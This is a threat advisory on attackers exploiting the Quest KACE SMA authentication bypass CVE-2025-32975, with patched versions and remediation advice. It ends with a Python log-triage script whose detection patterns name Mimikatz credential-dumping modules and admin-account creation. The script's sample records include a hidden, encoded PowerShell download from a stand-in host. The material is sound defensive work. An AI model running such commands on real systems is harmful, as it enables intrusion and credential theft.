March 25, 2026

Threat actors leverage 2025 Quest KACE SMA vulnerability

At a glance: A critical authentication bypass flaw in Quest KACE Systems Management Appliance (SMA) is being actively exploited in unpatched, internet-exposed systems. The vulnerability affects versions prior to patched releases from May 2025 and allows attackers to impersonate legitimate users without credentials, resulting in full administrative control.

Threat summary

Beginning the week of March 9, 2026, researchers reported malicious activity in customer environments linked to exploitation of unpatched Quest KACE Systems Management Appliance (SMA) instances exposed to the internet.

Quest KACE SMA is an on-premises endpoint management platform used for inventory, software deployment, patching, and monitoring, making it a high-value target.

The vulnerability, tracked as CVE-2025-32975, was originally patched in May 2025. It's a critical authentication bypass flaw in the single sign-on (SSO) mechanism that enables an adversary to impersonate legitimate users without valid credentials. The vulnerability allows complete administrative takeover of the appliance.

Researchers assigned the flaw the maximum Common Vulnerability Scoring System (CVSS) score of 10 out of 10.

Threat actors were observed using CVE-2025-32975 to gain initial access, execute remote commands, create new administrative accounts, harvest credentials, enumerate domain structures, and move laterally into backup infrastructure and domain controllers. Activity included use of Base64-encoded payloads, remote file downloads, PowerShell execution in hidden contexts, registry modifications, and credential theft via Mimikatz. These actions indicate a post‑compromise objective of expanding control across the environment.

The issue has been resolved via hotfix or patch in the following KACE SMA versions:

  • 13.0.385
  • 13.1.81
  • 13.2.183
  • 14.0.341 (Patch 5)
  • 14.1.101 (Patch 4)

Organizations running versions prior to these are affected if systems remain unpatched and publicly exposed.

Analysis

Because KACE SMA is an on-premises management appliance with broad administrative privileges, its compromise can lead to full administrative control, followed by domain-wide lateral movement, credential theft, and access to backup systems.

Applying the vendor-provided fixed versions released in May 2025 remediates CVE-2025-32975. Restricting external access to Quest KACE SMA reduces the attack surface; placing the appliance behind a virtual private network or firewall limits the exposure.

Reviewing logs for unauthorized administrative account creation, unexpected command execution, and credential harvesting activity is recommended. Environments with historical internet exposure may require deeper investigation for persistence mechanisms and lateral movement.
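As a starting point for that log review, the following added example (not part of the original advisory or any vendor tooling) triages process command lines for the behaviors listed above: hidden PowerShell, Base64-encoded commands, remote downloads, account creation, and Mimikatz module names. The rule names, the `(host, command line)` record shape, and the sample records are assumptions constructed for illustration; adapt the input to whatever your EDR or process-creation logs provide.

```python
import base64
import re

# PowerShell accepts -e, -ec, -enc ... -EncodedCommand followed by Base64 text.
ENC_RE = re.compile(r"(?i)\s-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{16,})")
RULES = {  # hypothetical rule names, one per behavior the advisory lists
    "hidden_powershell": re.compile(r"(?i)powershell.*\s-w\w*\s+hidden\b"),
    "account_or_admin_add": re.compile(
        r"(?i)\bnet\s+(?:user|localgroup\s+administrators)\s.*/add\b"),
    "mimikatz_module": re.compile(r"(?i)\b(?:sekurlsa|lsadump)::\w+"),
    "remote_download": re.compile(r"(?i)\b(?:invoke-webrequest|downloadstring)\b"),
}

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad Base64 or bad UTF-16 (both are ValueError subclasses)
        return None

def triage(cmdline):
    """Return the rule names that fire; rules also run over the decoded payload."""
    tags, text = [], cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.append("encoded_command")
        text = cmdline + "\n" + decoded
    return tags + [name for name, rx in RULES.items() if rx.search(text)]

def flagged(events):
    return [(h, t) for h, t in ((h, triage(c)) for h, c in events) if t]

def _enc(script):  # helper used only to build the constructed sample below
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample records (host, command line); not taken from a real incident.
SAMPLE_EVENTS = [
    ("ws-01", r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"),
    ("srv-02", "powershell.exe -w hidden -enc "
     + _enc("Invoke-WebRequest http://example.invalid/a.ps1 -OutFile a.ps1")),
    ("srv-02", "net user svc_temp /add"),
    ("srv-02", "net localgroup administrators svc_temp /add"),
    ("dc-01", "tool.exe sekurlsa::logonpasswords"),
]

if __name__ == "__main__":
    print(flagged(SAMPLE_EVENTS))
```

Decoding the `-EncodedCommand` payload before matching is what lets the download rule fire on the second record, since the raw command line only shows Base64.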